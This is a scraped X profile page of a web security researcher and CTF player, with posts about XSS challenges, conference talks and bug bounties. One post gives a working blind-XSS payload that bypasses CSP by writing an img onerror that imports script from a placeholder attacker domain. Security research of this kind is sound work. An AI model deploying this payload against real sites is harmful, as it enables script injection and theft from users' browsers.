pilvar (Philippe Dourassov) (@pilvar222) / X

pilvar (Philippe Dourassov)

423 posts

pilvar (Philippe Dourassov)

@pilvar222

AI Pentest Lead @AikidoSecurity

Lausanne, Switzerland

Joined October 2013

pilvar (Philippe Dourassov)
@pilvar222
Apr 28, 2024
🧵[1/9] Time to publish the solution to this challenge! x.com/pilvar222/stat… The goal of this challenge was to find an XSS while avoiding it being blocked by the CSP sent by the PHP header() function. Let's dive into it!
pilvar (Philippe Dourassov)
@pilvar222
Apr 23, 2024
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks". I've made a challenge about it, will you be able to pop an alert on pilv.ar ? The whole source code is in the screens below :)
46K
pilvar (Philippe Dourassov)
@pilvar222
May 13, 2024
My talk for @1ns0mn1h4ck is now available on youtube! Hope you'll enjoy it! :D
28K
pilvar (Philippe Dourassov)
@pilvar222
Apr 23, 2024
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks". I've made a challenge about it, will you be able to pop an alert on pilv.ar ? The whole source code is in the screens below :)
75K
pilvar (Philippe Dourassov)
@pilvar222
May 1, 2023
1) This is not a wordpress vulnerability, but a plugin's one 2) This is not a 0day, it's already been reported and fixed since September 3) If it was, you would be disclosing it unresponsibly Yet, you received tons of likes and RT by straight up lying 🤡
VulnVision
@VulnVision
Apr 30, 2023
we are happy to share a 0day we have found on wordpress login page allow un-auth cross site scripting (xss) #bugbountytip #BugBounty #ItTakesACrowd
13K
pilvar (Philippe Dourassov)
@pilvar222
Feb 5, 2024
My talk for @1ns0mn1h4ck 2024 got accepted! 😄🎉 I'm so excited!
3.9K
pilvar (Philippe Dourassov)
@pilvar222
Dec 19, 2022
Yay, I was awarded a $2000 bounty on @Hacker0x01! hackerone.com/pilvar #TogetherWeHitHarder Big thanks to all absurd XSS black magic fuckeries I've seen in various CTFs, really helped be getting my exploit to work :D
hackerone.com
HackerOne profile - pilvar
-
7.2K
pilvar (Philippe Dourassov)
@pilvar222
May 17, 2024
CTF challenge authors who put 8080 as the exposed port for their web challenges: *arrives in hell* Satan:
8.9K
pilvar (Philippe Dourassov)
@pilvar222
Nov 2, 2023
Imagine creating a web chall using the sanitizer API, then Chrome just fucking removes it with its new release 3 days before the CTF starts 💀 Anyway, come play LakeCTF, it's this weekend and I've prepared 2 challenges for it :) lakectf.epfl.ch (and go follow @polygl0ts!)
3.3K
pilvar (Philippe Dourassov)
@pilvar222
Sep 10, 2022
Why are CTF web challenges without source code still a thing in 2022
pilvar (Philippe Dourassov)
@pilvar222
Apr 1, 2024
This week, I'm training for team EU quals!
3.2K
pilvar (Philippe Dourassov)
@pilvar222
Feb 21, 2023
Thanks for the cool banner @secconctf :D
3.6K
pilvar (Philippe Dourassov)
@pilvar222
Mar 13, 2024
Haven't had this in the wild yet so don't know how useful of a tip this is, but adding a generic CSP bypass for your bxss payloads might be a good idea x=window.open("/%00"); setTimeout(()=>x.document.write("<img src=x onerror='import(\"//YourBXSSDomain\")'>"),999)
3.8K
pilvar (Philippe Dourassov)
@pilvar222
Jul 14, 2023
blooded two challs + first to full clear web, guess I'm the best web security company out there lol #BusinessCTF23
3.7K
pilvar (Philippe Dourassov)
@pilvar222
Jul 9, 2023
Getting flags from my uni while enjoying the sunrise, feels good ~
3.3K